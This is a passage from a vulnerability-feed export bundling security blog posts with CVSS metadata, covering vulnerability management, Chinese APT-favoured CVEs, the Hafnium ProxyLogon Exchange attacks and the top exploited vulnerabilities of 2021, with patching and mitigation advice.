compete in speed with attackers. Or you may know and control your perimeter far better than any outside researcher can. This means that you must understand why a particular service is needed on the perimeter. And whenever possible, try to minimize the number of such services as much as possible. For such services, you should specifically monitor security bulletins and start responding even before detection checks appear in vulnerability scanners. And of course before the media starts screaming about this vulnerability.\n\nOf course, it's easier said than done.\n\n## 6 groups of vulnerabilities that are most often used in attacks, according to Palo Alto, and the end of IT globalization\n\nIn the same "[Palo Alto 2022 Unit 42 Incident Response Report](<https://unit42.paloaltonetworks.com/incident-response-report/>)" there is one more interesting point. Groups of vulnerabilities that were most often used in attacks. "For cases where responders positively identified the vulnerability exploited by the threat actor, more than 87% of them fell into one of six CVE categories.".\n\nCVE categories:\n\n * 55% Microsoft Exchange ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207)\n * 14% Log4j\n * 7% SonicWall CVEs\n * 5% Microsoft Exchange ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065)\n * 4% Zoho ManageEngine ADSelfService Plus (CVE-2021-40539)\n * 3% Fortinet CVEs\n * 13% Other\n\nOn the one hand, this can be used to prioritize vulnerabilities. And also to identify software and software groups that need special monitoring. I would also like to look at the vulnerabilities in the Other category. But unfortunately they are not included in the report.\n\nOn the other hand, it shows how all these vulnerabilities and incidents depend on a particular region. Well of course Microsoft Exchange is used everywhere. Log4j has also affected almost every organization in one way or another. Perhaps in our region, I mean in Russia, some organizations use Fortinet. But SonicWall and Zoho look absolutely exotic. And in those locations where Unit 42 solves incident response cases, these are very important vendors and products.\n\nOr we can remember [last year's story with Kaseya VSA](<https://avleonov.com/2021/07/05/last-weeks-security-news-printnightmare-kaseya-intune-metasploit-docker-escape/>). Thousands of companies have been affected by the ransomware. But again, it was not in our region and therefore it was not particularly interesting for us.\n\nTaking into account the exodus of Western vendors from the Russian IT market, the landscapes "here" and "there" will differ more and more. More and more incidents in Russia, will occur due to vulnerabilities in our local software. In software that Western information security vendors may never have heard of. BTW, have you heard about [1C](<https://en.wikipedia.org/wiki/1C_Company>) ([Odin-Ass](<https://pikabu.ru/story/rossiyskiy_ryinok_programmnogo_obespecheniya_takoy_strannyiy_3895019>) )? And it works both ways. Does this mean that in Russia, we will need Vulnerability Management solutions focused on our Russian IT realities? Well apparently yes. And something tells me that this will not only happen in Russia.\n\nIt seems that the time of total globalization in IT is running out. And the ability of VM vendors to relatively easily take positions in new regions is also disappearing. The great fragmentation is coming. But it will be even more interesting that way. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-14T11:30:44", "type": "avleonov", "title": "Vulnerability Management news and publications #2", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2022-1388", "CVE-2022-26136", "CVE-2022-26137", "CVE-2022-26138"], "modified": "2022-08-14T11:30:44", "id": "AVLEONOV:4E65E4AC928647D5E246B06B953BBC6F", "href": "https://avleonov.com/2022/08/14/vulnerability-management-news-and-publications-2/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2022-10-14T00:05:09", "description": "In [a joint cybersecurity advisory](<https://www.nsa.gov/Press-Room/Press-Releases-Statements/Press-Release-View/Article/3181261/nsa-cisa-fbi-reveal-top-cves-exploited-by-chinese-state-sponsored-actors/>), the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) have revealed the top CVEs used by state-sponsored threat actors from China.\n\nThe advisory aims to \"inform federal and state, local, tribal and territorial (SLTT) government; critical infrastructure, including the Defense Industrial Base Sector; and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs).\"\n\nThe US and other allied nations consider China a cyber threat as it continues to target and attack companies in the US and elsewhere, with the primary aim of stealing intellectual property or gaining access to sensitive networks. The usual targets range from organizations in the IT sector, including telecommunications service providers; the [DIB (Defense Industrial Base)](<https://www.cisa.gov/defense-industrial-base-sector>) sector, which is related to military weapons systems; and other critical infrastructure sectors.\n\nIt is no surprise, then, that a majority of the CVEs revealed are for flaws allowing actors to surreptitiously and unlawfully gain access to networks. Within these networks, they establish persistence and move laterally to other connected systems.\n\nThe advisory is part of a concerted effort by US government agencies, particularly CISA, to push companies into getting on top of their patching. Part of that is getting them to patch much faster, and the other is getting them to focus on patching the vulnerabilities that threat actors are known to use.\n\nLast year, CISA [began publishing a catalog of actively exploited vulnerabilities](<https://www.malwarebytes.com/blog/news/2021/11/cisa-sets-two-week-window-for-patching-serious-vulnerabilities>) that need ot be patched within two weeks on federal information systems. The agencies behind this latest advisory have also collaborated in the past on a list of [vulnerabilities favored by Russian state-sponsored threat actors](<https://www.malwarebytes.com/blog/news/2021/04/patch-now-nsa-cisa-and-fbi-warn-of-russian-intelligence-exploiting-5-vulnerabilities>).\n\nIf your organization's intellectual property is likely to be of interest to China, this is list is for you. And if it isn't, this list is still worth paying attention to.\n\n## The vunerabilities\n\n### Remote code execution (RCE)\n\nRCE flaws let attackers execute malicious code on a compromised, remote computer. The advisory identifies 12 RCEs: [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) (also known as [Log4Shell or LogJam](<https://www.malwarebytes.com/blog/news/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend>)), [CVE-2021-22205](<https://www.malwarebytes.com/blog/news/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure>), [CVE-2022-26134](<https://www.malwarebytes.com/blog/news/2022/06/unpatched-atlassian-confluence-vulnerability-is-actively-exploited>), [CVE-2021-26855](<https://www.malwarebytes.com/blog/news/2022/03/avoslocker-ransomware-uses-microsoft-exchange-server-vulnerabilities-says-fbi>), [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>), [CVE-2021-26084](<https://www.malwarebytes.com/blog/news/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021>), [CVE-2021-42237](<https://nvd.nist.gov/vuln/detail/CVE-2021-42237>), [CVE-2022-1388](<https://www.malwarebytes.com/blog/news/2022/05/update-now-exploits-are-active-for-f5-big-ip-vulnerability>), [CVE-2021-40539](<https://www.malwarebytes.com/blog/news/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021>), [CVE-2021-26857](<https://www.malwarebytes.com/blog/news/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021>), [CVE-2021-26858](<https://www.malwarebytes.com/blog/news/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days>), and [CVE-2021-27065](<https://www.malwarebytes.com/blog/news/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days>).\n\n### Arbitrary file read\n\nThe advisory identifies two arbitrary file read flaws--[CVE-2019-11510](<https://www.malwarebytes.com/blog/business/2019/10/pulse-vpn-patched-their-vulnerability-but-businesses-are-trailing-behind>) and [CVE-2021-22005](<https://www.malwarebytes.com/blog/news/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure>)--which allow users or malicious programs with low privileges to read (but not write) any file on the affected system or server. Useful for stealing data.\n\n### Authentication bypass by spoofing\n\n[CVE-2022-24112](<https://nvd.nist.gov/vuln/detail/CVE-2022-24112>) is an authentication bypass flaw that allows attackers to access resources they shouldn't have access to by spoofing an IP address.\n\n### Command injection\n\n[CVE-2021-36260](<https://www.malwarebytes.com/blog/news/2022/08/thousands-of-hikvision-video-cameras-remain-unpatched-and-vulnerable-to-takeover>) is a command injection flaw that allows attackers to execute commands of their own choosing on an affected system. A vulnerable app is usually involved in such attacks.\n\n### Command line execution\n\n[CVE-2021-1497](<https://nvd.nist.gov/vuln/detail/CVE-2021-1497>) is a command injection flaw that allows attackers to inject data into an affected system's command line.\n\n### Path Traversal\n\nAlso known as \"directory traversal,\" these flaws allow attackers to read, and possibly write to, restricted files by inputting path traversal sequences like `../` into file or directory paths. [CVE-2019-19781](<https://www.malwarebytes.com/blog/news/2021/06/atomic-research-institute-breached-via-vpn-vulnerability>), [CVE-2021-41773](<https://www.malwarebytes.com/blog/news/2021/10/apache-http>), and [CVE-2021-20090](<https://www.malwarebytes.com/blog/news/2021/08/home-routers-are-being-hijacked-using-vulnerability-disclosed-just-2-days-ago>) are all forms of path traversal attack.\n\n## Mitigations\n\nThe NSA, CISA, and FBI urge organizations to undertake the following mitigations:\n\n * * Apply patches as they come, prioritizing the most critical l flaws in your environment.\n * Use multi-factor authentication.\n * Require the use of strong, unique passwords.\n * Upgrade or replace software or devices that are at, or close to, their end of life.\n * Consider adopting a [zero-trust security model](<https://www.malwarebytes.com/blog/news/2020/01/explained-the-strengths-and-weaknesses-of-the-zero-trust-model>).\n * Monitor and log Internet-facing systems for abnormal activity.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-13T16:15:00", "type": "malwarebytes", "title": "Chinese APT's favorite vulnerabilities revealed", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2021-1497", "CVE-2021-20090", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-36260", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42237", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-24112", "CVE-2022-26134"], "modified": "2022-10-13T16:15:00", "id": "MALWAREBYTES:D081BF7F95E3F31C6DB8CEF9AD86BD0D", "href": "https://www.malwarebytes.com/blog/news/2022/10/psa-chinese-apts-target-flaws-that-take-full-control-of-systems", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-16T10:27:50", "description": "Microsoft has detected multiple [zero-day](<https://blog.malwarebytes.com/glossary/zero-day/>) exploits being used to attack on-premises versions of Microsoft Exchange Server in limited and targeted attacks. Microsoft attributes the attacks to a group they have dubbed Hafnium.\n\n> \u201cHAFNIUM primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.\u201d\n\n### The Hafnium attack group\n\nBesides a rare metal that chemically resembles zirconium, Hafnium is a newly identified attack group that is also thought to be responsible for other attacks on internet-facing servers, and typically exfiltrates data to [file sharing sites](<https://blog.malwarebytes.com/how-tos-2/2020/12/file-sharing-and-cloud-storage-sites-how-safe-are-they/>). Despite their use of leased servers in the US, the group is believed to be based in China (as most security researchers will tell you, attribution is hard, especially when it involves international espionage).\n\n### Exchange Server\n\nIn many organizations, internal cooperation depends on groupware solutions that enable the central administration of emails, calendars, contacts, and tasks. Microsoft Exchange Server is software that offers this functionality for Windows-based server systems.\n\nIn this case the attacker was using one of the zero-day vulnerabilities to steal the full contents of several user mailboxes from such servers.\n\n### Not one, but four zero-days\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The CVE\u2019s (with descriptions provided by Microsoft) used in these attacks were:\n\n * [**CVE-2021-26855**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>): Microsoft Exchange Server Remote Code Execution Vulnerability. This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443.\n * [**CVE-2021-26857**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>): Microsoft Exchange Server Remote Code Execution Vulnerability. This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443.\n * [**CVE-2021-26858**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>): Microsoft Exchange Server Remote Code Execution Vulnerability. This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443.\n * [**CVE-2021-27065**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>): Microsoft Exchange Server Remote Code Execution Vulnerability. This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443.\n\nThey all look the same. Boring you said? Read on!\n\n### The attack chain\n\nWhile the CVE description is the same for the 4 CVE\u2019s we can learn from the report by the security firm that discovered the attacks, Volexity, that CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange that was used to steal mailbox content. The Remote Code Execution (RCE) vulnerability CVE-2021-26857 was used to run code under the System account. The other two zero-day flaws \u2014 CVE-2021-26858 and CVE-2021-27065 \u2014 would allow an attacker to write a file to any part of the server.\n\nTogether these 4 vulnerabilities form a powerful attack chain which only requires the attacker to find the server running Exchange, and the account from which they want to extract email. After exploiting these vulnerabilities to gain initial access, Hafnium operators deployed web shells on the compromised servers to gain persistence and make more changes. Web shells can allow attackers to steal data and perform additional malicious actions.\n\n### Urgent patching necessary\n\nEven though the use of the vulnerabilities was described as \u201climited\u201d, now that the information has been made public, we may see a quick rise in the number of attacks. Especially since the attack does not require a lot of information about the victim to start with.\n\nOr as Microsoft\u2019s vice president for customer security Tom Burt put it:\n\n> \u201cEven though we\u2019ve worked quickly to deploy an update for the Hafnium exploits, we know that many nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems.\u201d\n\nUsers of Microsoft Exchange Server 2013, Microsoft Exchange Server 2016, and Microsoft Exchange Server 2019 are advised to apply the updates immediately to protect against these exploits, prioritizing the externally facing Exchange servers.\n\nMicrosoft also advises that the initial stage of the attack can be stopped by "restricting untrusted connections, or by setting up a VPN to separate the Exchange server from external access", although the other parts of the attack chain can still be exploited, if other means of access are used.\n\n### Update March 4, 2021\n\nThe Cybersecurity and Infrastructure Security Agency issued an [emergency directive](<https://cyber.dhs.gov/ed/21-02/>) after CISA partners observed active exploitation of vulnerabilities in Microsoft Exchange _on-premises_ products. The directive gives detailed instructions for agencies to follow immediately after identifying all instances of on-premises Microsoft Exchange Servers in their environment.\n\nFor readers that are interested in the more technical details of the attack chain, [Veloxity published a blog](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) that provides details about their investigation, the vulnerabilities, and which also includes IOCs.\n\n### Update March 5, 2021\n\nIt turns out that [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>) was discovered in December of 2020 by DEVCORE who named the vulnerability ProxyLogon. They called it [ProxyLogon](<https://proxylogon.com/>) because this bug exploits against the Exchange **Proxy** Architecture and **Logon** mechanism. After DEVCORE chained the bugs together to a workable pre-auth RCE exploit, they sent an advisory and exploit to Microsoft through the MSRC portal. The entire timeline can be found [here](<https://proxylogon.com/#timeline>).\n\n### Update March 8, 2021\n\nMicrosoft has released an [updated script that scans Exchange log files](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) for indicators of compromise (IOCs) associated with the vulnerabilities disclosed on March 2, 2021. The US Cybersecurity & Infrastructure Security Agency (CISA) has [issued a warning](<https://us-cert.cisa.gov/ncas/current-activity/2021/03/06/microsoft-ioc-detection-tool-exchange-server-vulnerabilities>) that it is aware of widespread domestic and international exploitation of these vulnerabilities and strongly recommends organizations run the script as soon as possible.\n\nMicrosoft has also added definitions to its standalone malware scanner, the [Microsoft Safety Scanner](<https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/safety-scanner-download>) (also known as the Microsoft Support Emergency Response Tool or MSERT), so that it detects web shells.\n\nMalwarebytes detects web shells planted on comprised Exchange servers as [Backdoor.Hafnium](<https://blog.malwarebytes.com/detections/backdoor-hafnium/>). You can read more about the use of web shells in Exchange server attacks in our article [Microsoft Exchange attacks cause panic as criminals go shell collecting](<https://blog.malwarebytes.com/malwarebytes-news/2021/03/microsoft-exchange-attacks-cause-panic-as-criminals-go-shell-collecting/>).\n\n### Update March 12, 2021\n\nThe abuse of these vulnerabilities has sky-rocketed, and the first public proof-of-concept (PoC) exploit for the ProxyLogon flaws has appeared on GitHub, only to be taken down by the site. In spite of Microsoft's efforts, cybercriminals have shown in numbers that they are exploiting this opportunity to the fullest.\n\nA new form of ransomware has also entered the mix. Detections for DearCry, a new form of human-operated ransomware that's deployed through compromised Exchange servers, began yesterday. When the ransomware was still unknown, it would have been detected by Malwarebytes proactively, as Malware.Ransom.Agent.Generic. \n\nYou can read more about DearCry ransomware attacks in our article [Ransomware is targeting vulnerable Microsoft Exchange servers](<https://blog.malwarebytes.com/ransomware/2021/03/ransomware-is-targeting-vulnerable-microsoft-exchange-servers/>).\n\n### Update March 16, 2021\n\nMicrosoft has released a new, one-click mitigation tool for Exchange Server deployments. The Microsoft Exchange On-Premises Mitigation Tool will help customers who do not have dedicated security or IT teams to apply these security updates. This new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update.\n\nDetails, a [download link](<https://aka.ms/eomt>), user instructions, and more information can be found in the [Microsoft Security Response Center](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>). \n\nWe will keep you posted as we gather more information about these ransomware attacks.\n\nStay safe, everyone!\n\nThe post [Patch now! Exchange servers attacked by Hafnium zero-days](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-03T12:34:27", "type": "malwarebytes", "title": "Patch now! Exchange servers attacked by Hafnium zero-days", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-03T12:34:27", "id": "MALWAREBYTES:B4D157FAC0EB655355514D120382CC56", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-29T18:23:40", "description": "A joint Cybersecurity Advisory, coauthored by cybersecurity authorities of the United States (CISA, NSA, and FBI), Australia (ACSC), Canada (CCCS), New Zealand (NZ NCSC), and the United Kingdom (NCSC-UK) has detailed the top 15 Common Vulnerabilities and Exposures (CVEs) routinely exploited by malicious cyber actors in 2021, as well as other CVEs frequently exploited.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). These are the CVEs that made it into the top 10.\n\n## 1\\. Log4Shell\n\n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>), commonly referred to as [Log4Shell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend/>) or Logjam. This was a software flaw in the Apache Log4j logging utility. A logger is a piece of software that logs every event that happens in a computer system. The records it produces are useful for IT and security folks to trace errors or check any abnormal behavior within a system.\n\nWhen Log4Shell emerged in December 2021, what caught many by surprise was the enormous number of applications and web services, including those offered by Twitter, Apple, Google, Amazon, Steam, and Microsoft, among others, that were relying on Log4j, many of which inherited the vulnerability.\n\nThis made for an exceptionally broad attack surface. Combine that with an incredibly easy to use exploit and there should be no surprise that this vulnerability made it to the top of the list.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has launched an open source scanner to find applications that are vulnerable to the Log4j vulnerabilities listed as CVE-2021-44228 and CVE-2021-45046. The [CISA Log4j scanner](<https://github.com/cisagov/log4j-scanner>) is based on other open source tools and supports scanning lists of URLs, several fuzzing options, DNS callback, and payloads to circumvent web-application firewalls.\n\n## 2\\. CVE-2021-40539\n\n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>) is a REST API authentication bypass [vulnerability in ManageEngine\u2019s single sign-on (SSO) solution](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>) with resultant remote code execution (RCE) that exists in Zoho ManageEngine ADSelfService Plus version 6113 and prior. When word of this vulnerability came out it was already clear that it was being exploited in the wild. Zoho remarked that it was noticing indications of this vulnerability being exploited. Other researchers chimed in saying the attacks had thus far been highly targeted and limited, and possibly the work of a single threat actor. It was clear from the start that [APT](<https://blog.malwarebytes.com/glossary/advanced-persistent-threat-apt/>) threat-actors were likely among those exploiting the vulnerability.\n\nThe vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request. This allows attackers to carry out subsequent attacks resulting in RCE.\n\nFor those that have never heard of this software, it\u2019s a self-service password management and single sign-on (SSO) solution for Active Directory (AD) and cloud apps. Which means that any attacker that is able to exploit this vulnerability immediately has access to some of the most critical parts of a corporate network. A patch for this vulnerability was made available on September 7, 2021. Users were advised to update to ADSelfService Plus build 6114. The FBI, CISA, and CGCYBER also strongly urged organizations to make sure that ADSelfService Plus was not directly accessible from the Internet.\n\nThe [ManageEngine site](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>) has specific instructions on how to identify and update vulnerable installations.\n\n## 3\\. ProxyShell\n\nThird on the list are 3 vulnerabilities that we commonly grouped together and referred to as [ProxyShell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>). [CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>), [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>), and [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>).\n\nThe danger lies in the fact that these three vulnerabilities can be chained together to allow a remote attacker to run code on an unpatched Microsoft Exchange server. Attackers use them as follows:\n\n * **Get in** with CVE-2021-31207, a Microsoft Exchange Server security feature bypass vulnerability. The vulnerability allows a remote user to bypass the authentication process.\n * **Take control **with CVE-2021-34523, a Microsoft Exchange Server elevation of privilege (EoP) vulnerability. The vulnerability allows a user to raise their permissions.\n * **Do bad things** with CVE-2021-34473, a Microsoft Exchange Server remote code execution (RCE) vulnerability. The vulnerability allows an authenticated user to execute arbitrary code in the context of SYSTEM and write arbitrary files.\n\nThe vulnerabilities were found in Microsoft Exchange Server, which has a large userbase and which is usually set up as an Internet-facing instance. Plus, many publications have provided proof-of-concept (PoC) methodologies which anyone can copy and use.\n\nMicrosoft\u2019s Security Update from May 2021 remediates all three ProxyShell vulnerabilities.\n\n## 4\\. ProxyLogon\n\nAfter the ProxyShell entries we go straight to four vulnerabilities that are grouped under a similar name\u2014[ProxyLogon](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/proxylogon-poc-becomes-a-game-of-whack-a-mole/>)\u2014for similar reasons. [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>), [CVE-2021-2685](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) all share the same description\u2014"This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443."\n\nWhile the CVE description is the same for the 4 CVE\u2019s we have learned that CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange that was used to steal mailbox content. The RCE vulnerability CVE-2021-26857 was used to run code under the System account. The other two zero-day flaws\u2014CVE-2021-26858 and CVE-2021-27065\u2014would allow an attacker to write a file to any part of the server.\n\nTogether these four vulnerabilities form an attack chain that only requires the attacker to find the server running Exchange, and the account from which they want to extract email. After exploiting these vulnerabilities to gain initial access, threat actors deployed web shells on the compromised servers to gain persistence and make more changes. Web shells can allow attackers to steal data and perform additional malicious actions.\n\nProxyLogon started out as a limited and targeted attack method attributed to a group called [Hafnium](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/>). Unfortunately it went from limited and targeted attacks to a full-size panic in no time. Attackers started using the Exchange bugs to access vulnerable servers before establishing web shells to gain persistence and steal information.\n\nMicrosoft has released a one-click mitigation tool for Exchange Server deployments. The Microsoft Exchange On-Premises Mitigation Tool will help customers who do not have dedicated security or IT teams to apply these security updates. Details, a [download link](<https://aka.ms/eomt>), user instructions, and more information can be found in the [Microsoft Security Response Center](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>).\n\n## 5\\. CVE-2021-26084\n\n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>) is an Object-Graph Navigation Language (OGNL) injection vulnerability that exists in some versions of [Confluence Server and Data Center](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) that can allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. This was a zero-day vulnerability that was only patched after it was found to be actively exploited in the wild. An attacker could exploit the vulnerability by simply sending a specially crafted HTTP request containing a malicious parameter to a vulnerable install.\n\nShortly after the vulnerability was disclosed and a patch came out, researchers noticed massive scanning activity for vulnerable instances and crypto-miners started to use the vulnerability to run their code on unpatched servers.\n\nOn the [Confluence Support website](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) you can find a list of affected versions, instructions to upgrade, and a workaround for those that are unable to upgrade.\n\n## Lessons learned\n\nWhat does this list tell us to look out for in 2022?\n\nWell, first off, if you haven\u2019t patched one of the above we would urgently advise you to do so. And it wouldn\u2019t hurt to continue working down the [list](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>) provided by CISA.\n\nSecond, you may have noticed a pattern in what made these vulnerabilities so popular to exploit:\n\n * **A large attack surface**. Popular and widely used software makes for a larger number of potential victims. The money is in the numbers.\n * **Internet-facing instances**. Remember, your Internet-connected software shares the Internet with every basement-dwelling criminal hacker in the world.\n * **Easy exploitability**. When vulnerabilities are easy to exploit, and PoCs are publicly available and easy to deploy, the number of potential threat actors goes up.\n\nSo, if you notice or hear about a vulnerability that meets these "requirements" move it to the top of your "to-patch" list.\n\nStay safe, everyone!\n\nThe post [The top 5 most routinely exploited vulnerabilities of 2021](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": 